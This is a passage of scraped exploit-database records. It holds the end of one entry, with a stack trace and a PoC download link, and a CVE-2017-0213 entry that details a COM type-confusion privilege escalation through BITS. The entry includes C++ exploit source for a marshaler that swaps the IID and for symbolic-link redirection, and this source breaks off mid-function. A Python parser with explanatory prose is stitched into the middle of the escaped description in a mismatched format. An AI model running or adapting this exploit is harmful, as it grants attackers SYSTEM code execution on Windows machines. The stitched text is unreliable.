combase!InvokeStubWithExceptionPolicyAndTracing::__l7::<lambda_b8ffcec6d47a5635f374132234a8dd15>::operator()+0x42 [d:\\th\\com\\combase\\dcomrem\\channelb.cxx @ 1805]\r\n06 00000036`541fe210 00007fff`b3001885 combase!ObjectMethodExceptionHandlingAction<<lambda_b8ffcec6d47a5635f374132234a8dd15> >+0x72 [d:\\th\\com\\combase\\dcomrem\\excepn.hxx @ 91]\r\n07 (Inline Function) --------`-------- combase!InvokeStubWithExceptionPolicyAndTracing+0x9e [d:\\th\\com\\combase\\dcomrem\\channelb.cxx @ 1808]\r\n08 00000036`541fe280 00007fff`b3006194 combase!DefaultStubInvoke+0x275 [d:\\th\\com\\combase\\dcomrem\\channelb.cxx @ 1880]\r\n09 (Inline Function) --------`-------- combase!SyncStubCall::Invoke+0x1b [d:\\th\\com\\combase\\dcomrem\\channelb.cxx @ 1934]\r\n0a (Inline Function) --------`-------- combase!SyncServerCall::StubInvoke+0x1b [d:\\th\\com\\combase\\dcomrem\\servercall.hpp @ 736]\r\n0b (Inline Function) --------`-------- combase!StubInvoke+0x297 [d:\\th\\com\\combase\\dcomrem\\channelb.cxx @ 2154]\r\n0c 00000036`541fe4a0 00007fff`b3008b47 combase!ServerCall::ContextInvoke+0x464 [d:\\th\\com\\combase\\dcomrem\\ctxchnl.cxx @ 1568]\r\n0d (Inline Function) --------`-------- combase!CServerChannel::ContextInvoke+0x83 [d:\\th\\com\\combase\\dcomrem\\ctxchnl.cxx @ 1458]\r\n0e (Inline Function) --------`-------- combase!DefaultInvokeInApartment+0x9e [d:\\th\\com\\combase\\dcomrem\\callctrl.cxx @ 3438]\r\n0f 00000036`541fe770 00007fff`b3007ccd combase!AppInvoke+0x8a7 [d:\\th\\com\\combase\\dcomrem\\channelb.cxx @ 1618]\r\n10 00000036`541fe8a0 00007fff`b300b654 combase!ComInvokeWithLockAndIPID+0xb2d [d:\\th\\com\\combase\\dcomrem\\channelb.cxx @ 2686]\r\n11 00000036`541feb30 00007fff`b40fd433 combase!ThreadInvoke+0x1724 [d:\\th\\com\\combase\\dcomrem\\channelb.cxx @ 6954]\r\n12 00000036`541fedc0 00007fff`b40fbed8 RPCRT4!DispatchToStubInCNoAvrf+0x33\r\n13 00000036`541fee10 00007fff`b40fcf04 RPCRT4!RPC_INTERFACE::DispatchToStubWorker+0x288\r\n14 00000036`541fef10 
00007fff`b40f922d RPCRT4!RPC_INTERFACE::DispatchToStubWithObject+0x404\r\n15 00000036`541fefb0 00007fff`b40f9da9 RPCRT4!LRPC_SCALL::DispatchRequest+0x35d\r\n16 00000036`541ff090 00007fff`b40f64dc RPCRT4!LRPC_SCALL::HandleRequest+0x829\r\n17 00000036`541ff180 00007fff`b40f48c9 RPCRT4!LRPC_SASSOCIATION::HandleRequest+0x45c\r\n18 00000036`541ff200 00007fff`b411eaca RPCRT4!LRPC_ADDRESS::ProcessIO+0xb29\r\n19 00000036`541ff350 00007fff`b422e490 RPCRT4!LrpcIoComplete+0x10a\r\n1a 00000036`541ff3f0 00007fff`b422bc66 ntdll!TppAlpcpExecuteCallback+0x360\r\n1b 00000036`541ff4a0 00007fff`b34b8102 ntdll!TppWorkerThread+0x916\r\n1c 00000036`541ff8b0 00007fff`b425c5b4 KERNEL32!BaseThreadInitThunk+0x22\r\n1d 00000036`541ff8e0 00000000`00000000 ntdll!RtlUserThreadStart+0x34\r\n \r\nExpected Result:\r\nNot doing what ever it did.\r\n \r\nObserved Result:\r\nIt did it!\r\n \r\n \r\nProof of Concept:\r\nhttps://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42021.zip\n\n# 0day.today [2018-01-05] #", "sourceHref": "https://0day.today/exploit/27797", "cvss": {"score": 4.4, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-02-21T15:35:29", "description": "Exploit for windows platform in category local exploits", "cvss3": {}, "published": "2017-05-17T00:00:00", "type": "zdt", "title": "Microsoft Windows - COM Aggregate Marshaler/IRemUnknown2 Type Confusion Privilege Escalation Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-0213"], "modified": "2017-05-17T00:00:00", "id": "1337DAY-ID-27798", "href": "https://0day.today/exploit/description/27798", "sourceData": "/*\r\nSource: https://bugs.chromium.org/p/project-zero/issues/detail?id=1107\r\n \r\nWindows: COM Aggregate Marshaler/IRemUnknown2 Type Confusion EoP\r\nPlatform: Windows 10 10586/14393 not tested 8.1 Update 2\r\nClass: Elevation of Privilege\r\n \r\nSummary:\r\nWhen accessing an OOP COM object using IRemUnknown2 the local unmarshaled 
proxy can be for a different interface to that requested by QueryInterface, resulting in a type confusion which can result in EoP.\r\n \r\nDescription:\r\n \r\nQuerying for an IID on an OOP (or remote) COM object calls the ORPC method RemQueryInterface or RemQueryInterface2 on the default proxy. This request is passed to the remote object, which queries the implementation object and, if successful, returns a marshaled representation of that interface to the caller. \r\n \r\nThe difference between RemQueryInterface and RemQueryInterface2 (RQI2) is how the objects are passed back to the caller. For RemQueryInterface the interface is passed back as a STDOBJREF, which only contains the basic OXID/OID/IPID information to connect back. RemQueryInterface2 on the other hand passes back MInterfacePointer structures, each of which is an entire OBJREF. The rationale, as far as I can tell, is that RQI2 is used for implementing in-process handlers: some interfaces can be marshaled using the standard marshaler and others can be custom marshaled. This is exposed through the Aggregate Standard Marshaler. \r\n \r\nThe bug lies in the implementation of unpacking the results of the RQI2 request in CStdMarshal::Finish_RemQIAndUnmarshal2. For each MInterfacePointer, CStdMarshal::UnmarshalInterface is called, passing the IID of the expected interface and the binary data wrapped in an IStream. CStdMarshal::UnmarshalInterface blindly unmarshals the interface, which creates a local proxy object, but the proxy is created for the IID in the OBJREF stream and NOT the IID requested in RQI2. No further verification occurs at this point and the created proxy is passed back up the call stack until it is received by the caller (through a void** obviously). \r\n \r\nIf the IID in the OBJREF doesn\u2019t match the IID requested, the caller doesn\u2019t know; if it calls any methods on the expected interface it will be calling a type confused object. 
This could result in crashes in the caller when it tries to access methods on the expected interface which aren\u2019t there or are implemented differently. You could probably also return a standard OBJREF to an object local to the caller; this will result in returning the local object itself, which might have more scope for exploiting the type confusion. In order to get the caller to use RQI2 we just need to pass it back an object which is custom marshaled with the Aggregate Standard Marshaler. This will set a flag on the marshaler which indicates to always use the aggregate marshaler, which results in using RQI2 instead of RQI. As this class is a core component of COM it\u2019s trusted and so isn\u2019t affected by the EOAC_NO_CUSTOM_MARSHAL setting.\r\n \r\nIn order to exploit this a different caller needs to call QueryInterface on an object under a less trusted user's control. This could be a more privileged user (such as a sandbox broker), or a privileged service. This is a pretty easy pattern to find: any method in an exposed interface on a more trusted COM object which takes an interface pointer or variant would potentially be vulnerable. For example IPersistStream takes an IStream interface pointer and will call methods on it. Another type of method is one of the various notification interfaces such as IBackgroundCopyCallback for BITS. This can probably also be used remotely if the attacker has the opportunity to inject an OBJREF stream into a connection which is set to CONNECT level security (which seems to be the default activation security). \r\n \r\nOn to exploitation, as you well know I\u2019ve little interest in exploiting memory corruptions, especially as this would either trigger CFG on modern systems or require a very precise lineup of expected method and actual called method, which could be tricky to exploit reliably. However I think that, at least for escaping a sandbox, it might be your only option. 
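As an added example, not code from the original PoC or from Microsoft, the following Python parses the OBJREF stream that RemQueryInterface2 hands back and applies the check the text says CStdMarshal::Finish_RemQIAndUnmarshal2 omits: the IID carried inside the OBJREF must equal the IID that was requested. The layout follows MS-DCOM section 2.2.18; the IBackgroundCopyCallback IID is taken from bits.h; CLSID_AggStdMarshal2 and IID_ITMediaControl are the values the PoC below uses; the sample OBJREF streams, the host address and the IPID are constructed here for the demonstration.

```python
import struct
import uuid

# OBJREF layout follows MS-DCOM section 2.2.18 (assumption: taken from the
# spec, not from the PoC on this page). Multi-byte fields are little-endian.
OBJREF_SIGNATURE = 0x574F454D                       # ASCII 'MEOW'
OBJREF_STANDARD, OBJREF_HANDLER, OBJREF_CUSTOM, OBJREF_EXTENDED = 1, 2, 4, 8

# Values used by the PoC: the aggregate standard marshaler CLSID and the
# IID it substitutes for the callback interface.
CLSID_AGG_STD_MARSHAL = uuid.UUID('00000027-0000-0008-c000-000000000046')
IID_ITMEDIACONTROL = uuid.UUID('c445dde8-5199-4bc7-9807-5ffb92e42e09')
# IID the BITS service really asks for (IBackgroundCopyCallback, from bits.h).
IID_IBACKGROUNDCOPYCALLBACK = uuid.UUID('97ea99c7-0186-4ad4-8df9-c5b4e0ed6b22')
# Constructed IPID for the sample streams below.
SAMPLE_IPID = uuid.UUID(int=0x1234)


def _guid(data, off):
    return uuid.UUID(bytes_le=bytes(data[off:off + 16])), off + 16


def parse_objref(data):
    '''Parse the OBJREF header plus the STANDARD, HANDLER and CUSTOM bodies.
    Returns a dict; raises ValueError on truncated or unknown input.'''
    if len(data) < 24:
        raise ValueError('OBJREF shorter than signature+flags+iid')
    sig, flags = struct.unpack_from('<II', data, 0)
    if sig != OBJREF_SIGNATURE:
        raise ValueError('bad OBJREF signature 0x%08x' % sig)
    iid, off = _guid(data, 8)
    ref = {'flags': flags, 'iid': iid}
    if flags == OBJREF_CUSTOM:
        # clsid of the unmarshaler, cbExtension, size, then opaque object data
        ref['clsid'], off = _guid(data, off)
        _cb_ext, size = struct.unpack_from('<II', data, off)
        off += 8
        if off + size > len(data):
            raise ValueError('custom OBJREF data runs past the buffer')
        ref['object_data'] = bytes(data[off:off + size])
    elif flags in (OBJREF_STANDARD, OBJREF_HANDLER):
        # STDOBJREF: flags, cPublicRefs, OXID, OID, IPID
        _sflags, refs, oxid, oid = struct.unpack_from('<IIQQ', data, off)
        off += 24
        ref['ipid'], off = _guid(data, off)
        ref.update(public_refs=refs, oxid=oxid, oid=oid)
        if flags == OBJREF_HANDLER:
            ref['clsid'], off = _guid(data, off)
        # DUALSTRINGARRAY: wNumEntries, wSecurityOffset, then a uint16 array
        n_entries, sec_off = struct.unpack_from('<HH', data, off)
        off += 4
        if off + 2 * n_entries > len(data):
            raise ValueError('DUALSTRINGARRAY runs past the buffer')
        ref['string_bindings'] = bytes(data[off:off + 2 * sec_off])
    elif flags == OBJREF_EXTENDED:
        ref['note'] = 'OBJREF_EXTENDED body not parsed here'
    else:
        raise ValueError('unknown OBJREF flags 0x%x' % flags)
    return ref


def check_unmarshal(data, requested_iid):
    '''The check Finish_RemQIAndUnmarshal2 skipped: accept the stream only if
    the IID it carries is the IID the caller asked for. Also report an
    aggregate-standard-marshaler custom OBJREF, which is what forces RQI2.'''
    ref = parse_objref(data)
    findings = []
    if ref['iid'] != requested_iid:
        findings.append('iid mismatch: requested %s, OBJREF carries %s'
                        % (requested_iid, ref['iid']))
    if ref['flags'] == OBJREF_CUSTOM and ref.get('clsid') == CLSID_AGG_STD_MARSHAL:
        findings.append('custom marshal via CLSID_AggStdMarshal (forces RemQueryInterface2)')
    return ref['iid'] == requested_iid, findings


def build_dual_string_array(host):
    '''Minimal DUALSTRINGARRAY: one ncacn_ip_tcp (tower id 7) string binding
    and one NTLM (authn 10) security binding, each array null-terminated.'''
    strings = struct.pack('<H', 7) + host.encode('utf-16-le') + struct.pack('<HH', 0, 0)
    security = struct.pack('<HHHH', 10, 0xFFFF, 0, 0)
    return (struct.pack('<HH', (len(strings) + len(security)) // 2, len(strings) // 2)
            + strings + security)


def build_standard_objref(iid, ipid=SAMPLE_IPID, host='192.0.2.10'):
    '''What the remote side returns for RemQueryInterface: a standard OBJREF.'''
    stdobjref = struct.pack('<IIQQ', 0, 5, 0x1122334455667788, 0x8877665544332211) + ipid.bytes_le
    return (struct.pack('<II', OBJREF_SIGNATURE, OBJREF_STANDARD) + iid.bytes_le
            + stdobjref + build_dual_string_array(host))


def build_custom_objref(iid, clsid, payload):
    '''A custom-marshaled OBJREF, e.g. what CMarshaller in the PoC emits.'''
    return (struct.pack('<II', OBJREF_SIGNATURE, OBJREF_CUSTOM) + iid.bytes_le
            + clsid.bytes_le + struct.pack('<II', 0, len(payload)) + payload)


if __name__ == '__main__':
    # BITS asked for IBackgroundCopyCallback; the client marshaled ITMediaControl.
    evil = build_standard_objref(IID_ITMEDIACONTROL)
    print(check_unmarshal(evil, IID_IBACKGROUNDCOPYCALLBACK))
```

Running it reproduces the BITS case in miniature: a standard OBJREF whose IID is ITMediaControl is refused when IBackgroundCopyCallback was requested, and a custom OBJREF naming the aggregate standard marshaler is flagged as the thing that steers the caller onto the RQI2 path. The ITMediaControl proxy that the real unmarshal code went on to create is exactly what this comparison would have stopped.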
So I\u2019m not going to do that; instead I\u2019m going to exploit it logically. The only problem is that this is probably unexploitable from a sandbox (maybe) and requires a very specific type of callback into our object. \r\n \r\nThe thing I\u2019m going to exploit is in the handling of OLE Automation auto-proxy creation from type libraries. When you implement an Automation compatible object you could implement an explicit proxy, but if you\u2019ve already got a Type library built from your IDL then OLEAUT32 provides an alternative. If you register your interface with a Proxy CLSID for PSOAInterface or PSDispatch then instead of loading your PS DLL it will load OLEAUT32. The proxy loader code will look up the interface entry for the passed IID to see if there\u2019s a registered type library associated with it. If there is, the code will call LoadTypeLib on that library and look up the interface entry in the type library. It will then construct a custom proxy object based on the type library information. \r\n \r\nThe trick here is that while in general we don\u2019t control the location of the type library (so it\u2019s probably in a location we can\u2019t write to, such as system32), if we can get an object unmarshaled which indicates its IID is one of these auto-proxy interfaces while the privileged service is impersonating us, we can redirect the C: drive to anywhere we like and so get the service to load an arbitrary type library file instead of the system one. One easy place where this exact scenario occurs is in the aforementioned BITS SetNotifyInterface function. The service first impersonates the caller before calling QI on the notify interface. We can then return an OBJREF for an automation IID even though the service asked for a BITS callback interface.\r\n \r\nSo what? Well, it\u2019s been known for almost 10 years that the Type library file format is completely unsafe. 
It was reported and it wasn\u2019t changed; Tombkeeper highlighted this in his \u201cSexrets [sic] of LoadLibrary\u201d presentation at CSW 2015. You can craft a TLB which will directly control EIP. Now you\u2019d assume therefore that I\u2019m trading an unreliable way of getting EIP control for one which is much easier; if you assume that you\u2019d be wrong. Instead I\u2019m going to abuse the fact that TLBs can have referenced type libraries, which is used instead of embedding the type definitions inside the TLB itself. When a reference type is loaded the loader will try and look up the TLB by its GUID; if that fails it will take the filename string and pass it verbatim to LoadTypeLib. It\u2019s a lesser known fact that this function, if it fails to find a file with the correct name, will try and parse the name as a moniker. Therefore we can insert a scriptlet moniker into the type library; when the auto-proxy generator tries to find how many functions the interface implements it walks the inheritance chain, which causes the referenced TLB to be loaded, which causes a scriptlet moniker to be loaded and bound, which results in arbitrary execution in a scripting language inside the privileged COM caller. \r\n \r\nThe need to replace the C: drive is why this won\u2019t work as a sandbox escape. Also, it's a more general technique, not specific to this vulnerability as such: you could exploit it in the low-level NDR marshaler layer, however it\u2019s rare to find something impersonating the caller during the low-level unmarshal. Type libraries are not loaded using the flag added after CVE-2015-1644 which prevents DLLs being loaded from the impersonate device map. 
I think you might want to fix this as well, as there are other places and scenarios this can occur; for example there are a number of WMI services (such as anything which touches GPOs) which result in the ActiveDS COM object being created, and this is automation compatible and so will load a type library while impersonating the caller. Perhaps the auto-proxy generator should temporarily disable impersonation when loading the type library to prevent this happening. \r\n \r\nProof of Concept:\r\n \r\nI\u2019ve provided a PoC as a C++ source code file. You need to compile it first. It abuses the BITS SetNotifyInterface to get a type library loaded under impersonation. We cause it to load a type library which references a scriptlet moniker, which gets us code execution inside the BITS service.\r\n \r\n1) Compile the C++ source code file.\r\n2) Execute the PoC from a directory writable by the current user. \r\n3) An admin command running as local system should appear on the current desktop.\r\n \r\nExpected Result:\r\nThe caller should realize there\u2019s an IID mismatch and refuse to unmarshal, or at least QI the local proxy for the correct interface.\r\n \r\nObserved Result:\r\nA proxy for a different IID from the one requested is created, resulting in type confusion and an automation proxy being created, resulting in code execution in the BITS server.\r\n*/\r\n \r\n// BITSTest.cpp : Defines the entry point for the console application.\r\n//\r\n#include <bits.h>\r\n#include <bits4_0.h>\r\n#include <stdio.h>\r\n#include <tchar.h>\r\n#include <lm.h>\r\n#include <string>\r\n#include <comdef.h>\r\n#include <winternl.h>\r\n#include <Shlwapi.h>\r\n#include <strsafe.h>\r\n#include <vector>\r\n \r\n#pragma comment(lib, \"shlwapi.lib\")\r\n \r\nstatic bstr_t IIDToBSTR(REFIID riid)\r\n{\r\n LPOLESTR str;\r\n bstr_t ret = \"Unknown\";\r\n if (SUCCEEDED(StringFromIID(riid, &str)))\r\n {\r\n ret = str;\r\n CoTaskMemFree(str);\r\n }\r\n return ret;\r\n}\r\n \r\nGUID CLSID_AggStdMarshal2 = { 
0x00000027,0x0000,0x0008,{ 0xc0,0x00,0x00,0x00,0x00,0x00,0x00,0x46 } };\r\nGUID IID_ITMediaControl = { 0xc445dde8,0x5199,0x4bc7,{ 0x98,0x07,0x5f,0xfb,0x92,0xe4,0x2e,0x09 } };\r\n \r\nclass CMarshaller : public IMarshal\r\n{\r\n LONG _ref_count;\r\n IUnknownPtr _unk;\r\n \r\n ~CMarshaller() {}\r\n \r\npublic:\r\n \r\n CMarshaller(IUnknown* unk) : _ref_count(1)\r\n {\r\n _unk = unk;\r\n }\r\n \r\n virtual HRESULT STDMETHODCALLTYPE QueryInterface(\r\n /* [in] */ REFIID riid,\r\n /* [iid_is][out] */ _COM_Outptr_ void __RPC_FAR *__RPC_FAR *ppvObject)\r\n {\r\n *ppvObject = nullptr;\r\n printf(\"QI - Marshaller: %ls %p\\n\", IIDToBSTR(riid).GetBSTR(), this);\r\n \r\n if (riid == IID_IUnknown)\r\n {\r\n *ppvObject = this;\r\n }\r\n else if (riid == IID_IMarshal)\r\n {\r\n *ppvObject = static_cast<IMarshal*>(this);\r\n }\r\n else\r\n {\r\n return E_NOINTERFACE;\r\n }\r\n printf(\"Queried Success: %p\\n\", *ppvObject);\r\n ((IUnknown*)*ppvObject)->AddRef();\r\n return S_OK;\r\n }\r\n \r\n virtual ULONG STDMETHODCALLTYPE AddRef(void)\r\n {\r\n printf(\"AddRef: %d\\n\", _ref_count);\r\n return InterlockedIncrement(&_ref_count);\r\n }\r\n \r\n virtual ULONG STDMETHODCALLTYPE Release(void)\r\n {\r\n printf(\"Release: %d\\n\", _ref_count);\r\n ULONG ret = InterlockedDecrement(&_ref_count);\r\n if (ret == 0)\r\n {\r\n printf(\"Release object %p\\n\", this);\r\n delete this;\r\n }\r\n return ret;\r\n }\r\n \r\n virtual HRESULT STDMETHODCALLTYPE GetUnmarshalClass(\r\n /* [annotation][in] */\r\n _In_ REFIID riid,\r\n /* [annotation][unique][in] */\r\n _In_opt_ void *pv,\r\n /* [annotation][in] */\r\n _In_ DWORD dwDestContext,\r\n /* [annotation][unique][in] */\r\n _Reserved_ void *pvDestContext,\r\n /* [annotation][in] */\r\n _In_ DWORD mshlflags,\r\n /* [annotation][out] */\r\n _Out_ CLSID *pCid)\r\n {\r\n *pCid = CLSID_AggStdMarshal2;\r\n return S_OK;\r\n }\r\n \r\n virtual HRESULT STDMETHODCALLTYPE GetMarshalSizeMax(\r\n /* [annotation][in] */\r\n _In_ REFIID riid,\r\n /* 
[annotation][unique][in] */\r\n _In_opt_ void *pv,\r\n /* [annotation][in] */\r\n _In_ DWORD dwDestContext,\r\n /* [annotation][unique][in] */\r\n _Reserved_ void *pvDestContext,\r\n /* [annotation][in] */\r\n _In_ DWORD mshlflags,\r\n /* [annotation][out] */\r\n _Out_ DWORD *pSize)\r\n {\r\n *pSize = 1024;\r\n return S_OK;\r\n }\r\n \r\n virtual HRESULT STDMETHODCALLTYPE MarshalInterface(\r\n /* [annotation][unique][in] */\r\n _In_ IStream *pStm,\r\n /* [annotation][in] */\r\n _In_ REFIID riid,\r\n /* [annotation][unique][in] */\r\n _In_opt_ void *pv,\r\n /* [annotation][in] */\r\n _In_ DWORD dwDestContext,\r\n /* [annotation][unique][in] */\r\n _Reserved_ void *pvDestContext,\r\n /* [annotation][in] */\r\n _In_ DWORD mshlflags)\r\n {\r\n printf(\"Marshal Interface: %ls\\n\", IIDToBSTR(riid).GetBSTR());\r\n IID iid = riid;\r\n if (iid == __uuidof(IBackgroundCopyCallback2) || iid == __uuidof(IBackgroundCopyCallback))\r\n {\r\n printf(\"Setting bad IID\\n\");\r\n iid = IID_ITMediaControl;\r\n }\r\n HRESULT hr = CoMarshalInterface(pStm, iid, _unk, dwDestContext, pvDestContext, mshlflags);\r\n printf(\"Marshal Complete: %08X\\n\", hr);\r\n return hr;\r\n }\r\n \r\n virtual HRESULT STDMETHODCALLTYPE UnmarshalInterface(\r\n /* [annotation][unique][in] */\r\n _In_ IStream *pStm,\r\n /* [annotation][in] */\r\n _In_ REFIID riid,\r\n /* [annotation][out] */\r\n _Outptr_ void **ppv)\r\n {\r\n return E_NOTIMPL;\r\n }\r\n \r\n virtual HRESULT STDMETHODCALLTYPE ReleaseMarshalData(\r\n /* [annotation][unique][in] */\r\n _In_ IStream *pStm)\r\n {\r\n return S_OK;\r\n }\r\n \r\n virtual HRESULT STDMETHODCALLTYPE DisconnectObject(\r\n /* [annotation][in] */\r\n _In_ DWORD dwReserved)\r\n {\r\n return S_OK;\r\n }\r\n};\r\n \r\nclass FakeObject : public IBackgroundCopyCallback2, public IPersist\r\n{\r\n LONG m_lRefCount;\r\n \r\n ~FakeObject() {};\r\n \r\npublic:\r\n //Constructor, Destructor\r\n FakeObject() {\r\n m_lRefCount = 1;\r\n }\r\n \r\n //IUnknown\r\n HRESULT __stdcall 
QueryInterface(REFIID riid, LPVOID *ppvObj)\r\n {\r\n if (riid == __uuidof(IUnknown))\r\n {\r\n printf(\"Query for IUnknown\\n\");\r\n *ppvObj = this;\r\n }\r\n else if (riid == __uuidof(IBackgroundCopyCallback2))\r\n {\r\n printf(\"Query for IBackgroundCopyCallback2\\n\");\r\n *ppvObj = static_cast<IBackgroundCopyCallback2*>(this);\r\n }\r\n else if (riid == __uuidof(IBackgroundCopyCallback))\r\n {\r\n printf(\"Query for IBackgroundCopyCallback\\n\");\r\n *ppvObj = static_cast<IBackgroundCopyCallback*>(this);\r\n }\r\n else if (riid == __uuidof(IPersist))\r\n {\r\n printf(\"Query for IPersist\\n\");\r\n *ppvObj = static_cast<IPersist*>(this);\r\n }\r\n else if (riid == IID_ITMediaControl)\r\n {\r\n printf(\"Query for ITMediaControl\\n\");\r\n *ppvObj = static_cast<IPersist*>(this);\r\n }\r\n else\r\n {\r\n printf(\"Unknown IID: %ls %p\\n\", IIDToBSTR(riid).GetBSTR(), this);\r\n *ppvObj = NULL;\r\n return E_NOINTERFACE;\r\n }\r\n \r\n ((IUnknown*)*ppvObj)->AddRef();\r\n return NOERROR;\r\n }\r\n \r\n ULONG __stdcall AddRef()\r\n {\r\n return InterlockedIncrement(&m_lRefCount);\r\n }\r\n \r\n ULONG __stdcall Release()\r\n {\r\n ULONG ulCount = InterlockedDecrement(&m_lRefCount);\r\n \r\n if (0 == ulCount)\r\n {\r\n delete this;\r\n }\r\n \r\n return ulCount;\r\n }\r\n \r\n virtual HRESULT STDMETHODCALLTYPE JobTransferred(\r\n /* [in] */ __RPC__in_opt IBackgroundCopyJob *pJob)\r\n {\r\n printf(\"JobTransferred\\n\");\r\n return S_OK;\r\n }\r\n \r\n virtual HRESULT STDMETHODCALLTYPE JobError(\r\n /* [in] */ __RPC__in_opt IBackgroundCopyJob *pJob,\r\n /* [in] */ __RPC__in_opt IBackgroundCopyError *pError)\r\n {\r\n printf(\"JobError\\n\");\r\n return S_OK;\r\n }\r\n \r\n \r\n virtual HRESULT STDMETHODCALLTYPE JobModification(\r\n /* [in] */ __RPC__in_opt IBackgroundCopyJob *pJob,\r\n /* [in] */ DWORD dwReserved)\r\n {\r\n printf(\"JobModification\\n\");\r\n return S_OK;\r\n }\r\n \r\n \r\n virtual HRESULT STDMETHODCALLTYPE FileTransferred(\r\n /* [in] */ __RPC__in_opt 
IBackgroundCopyJob *pJob,\r\n /* [in] */ __RPC__in_opt IBackgroundCopyFile *pFile)\r\n {\r\n printf(\"FileTransferred\\n\");\r\n return S_OK;\r\n }\r\n \r\n virtual HRESULT STDMETHODCALLTYPE GetClassID(\r\n /* [out] */ __RPC__out CLSID *pClassID)\r\n {\r\n *pClassID = GUID_NULL;\r\n return S_OK;\r\n }\r\n};\r\n \r\n_COM_SMARTPTR_TYPEDEF(IBackgroundCopyJob, __uuidof(IBackgroundCopyJob));\r\n_COM_SMARTPTR_TYPEDEF(IBackgroundCopyManager, __uuidof(IBackgroundCopyManager));\r\n \r\nstatic HRESULT Check(HRESULT hr)\r\n{\r\n if (FAILED(hr))\r\n {\r\n throw _com_error(hr);\r\n }\r\n return hr;\r\n}\r\n \r\n#define SYMBOLIC_LINK_ALL_ACCESS (STANDARD_RIGHTS_REQUIRED | 0x1)\r\n \r\ntypedef NTSTATUS(NTAPI* fNtCreateSymbolicLinkObject)(PHANDLE LinkHandle, ACCESS_MASK DesiredAccess, POBJECT_ATTRIBUTES ObjectAttributes, PUNICODE_STRING TargetName);\r\ntypedef VOID(NTAPI *fRtlInitUnicodeString)(PUNICODE_STRING DestinationString, PCWSTR SourceString);\r\n \r\nFARPROC GetProcAddressNT(LPCSTR lpName)\r\n{\r\n return GetProcAddress(GetModuleHandleW(L\"ntdll\"), lpName);\r\n}\r\n \r\n \r\nclass ScopedHandle\r\n{\r\n HANDLE _h;\r\npublic:\r\n ScopedHandle() : _h(nullptr)\r\n {\r\n }\r\n \r\n ScopedHandle(ScopedHandle&) = delete;\r\n \r\n ScopedHandle(ScopedHandle&& h) {\r\n _h = h._h;\r\n h._h = nullptr;\r\n }\r\n \r\n ~ScopedHandle()\r\n {\r\n if (!invalid())\r\n {\r\n CloseHandle(_h);\r\n _h = nullptr;\r\n }\r\n }\r\n \r\n bool invalid() {\r\n return (_h == nullptr) || (_h == INVALID_HANDLE_VALUE);\r\n }\r\n \r\n void set(HANDLE h)\r\n {\r\n _h = h;\r\n }\r\n \r\n HANDLE get()\r\n {\r\n return _h;\r\n }\r\n \r\n HANDLE* ptr()\r\n {\r\n return &_h;\r\n }\r\n \r\n \r\n};\r\n \r\nScopedHandle CreateSymlink(LPCWSTR linkname, LPCWSTR targetname)\r\n{\r\n fRtlInitUnicodeString pfRtlInitUnicodeString = (fRtlInitUnicodeString)GetProcAddressNT(\"RtlInitUnicodeString\");\r\n fNtCreateSymbolicLinkObject pfNtCreateSymbolicLinkObject = 
(fNtCreateSymbolicLinkObject)GetProcAddressNT(\"NtCreateSymbolicLinkObject\");\r\n \r\n OBJECT_ATTRIBUTES objAttr;\r\n UNICODE_STRING name;\r\n UNICODE_STRING target;\r\n \r\n pfRtlInitUnicodeString(&name, linkname);\r\n pfRtlInitUnicodeString(&target, targetname);\r\n \r\n InitializeObjectAttributes(&objAttr, &name, OBJ_CASE_INSENSITIVE, nullptr, nullptr);\r\n \r\n ScopedHandle hLink;\r\n \r\n NTSTATUS status = pfNtCreateSymbolicLinkObject(hLink.ptr(), SYMBOLIC_LINK_ALL_ACCESS, &objAttr, &target);\r\n if (status == 0)\r\n {\r\n printf(\"Opened Link %ls -> %ls: %p\\n\", linkname, targetname, hLink.get());\r\n return hLink;\r\n }\r\n else\r\n {\r\n printf(\"Error creating link %ls: %08X\\n\", linkname, status);\r\n return ScopedHandle();\r\n }\r\n}\r\n \r\n \r\nbstr_t GetSystemDrive()\r\n{\r\n WCHAR windows_dir[MAX_PATH] = { 0 };\r\n \r\n GetWindowsDirectory(windows_dir, MAX_PATH);\r\n \r\n windows_dir[2] = 0;\r\n \r\n return windows_dir;\r\n}\r\n \r\nbstr_t GetDeviceFromPath(LPCWSTR lpPath)\r\n{\r\n WCHAR drive[3] = { 0 };\r\n drive[0] = lpPath[0];\r\n drive[1] = lpPath[1];\r\n drive[2] = 0;\r\n \r\n WCHAR device_name[MAX_PATH] = { 0 };\r\n \r\n if (QueryDosDevice(drive, device_name, MAX_PATH))\r\n {\r\n return device_name;\r\n }\r\n else\r\n {\r\n printf(\"Error getting device for %ls\\n\", lpPath);\r\n exit(1);\r\n }\r\n}\r\n \r\nbstr_t GetSystemDevice()\r\n{\r\n return GetDeviceFromPath(GetSystemDrive());\r\n}\r\n \r\nbstr_t GetExe()\r\n{\r\n WCHAR curr_path[MAX_PATH] = { 0 };\r\n GetModuleFileName(nullptr, curr_path, MAX_PATH);\r\n return curr_path;\r\n}\r\n \r\nbstr_t GetExeDir()\r\n{\r\n WCHAR curr_path[MAX_PATH] = { 0 };\r\n GetModuleFileName(nullptr, curr_path, MAX_PATH);\r\n PathRemoveFileSpec(curr_path);\r\n \r\n return curr_path;\r\n}\r\n \r\nbstr_t GetCurrentPath()\r\n{\r\n bstr_t curr_path = GetExeDir();\r\n \r\n bstr_t ret = GetDeviceFromPath(curr_path);\r\n \r\n ret += &curr_path.GetBSTR()[2];\r\n \r\n return ret;\r\n}\r\n \r\nvoid 
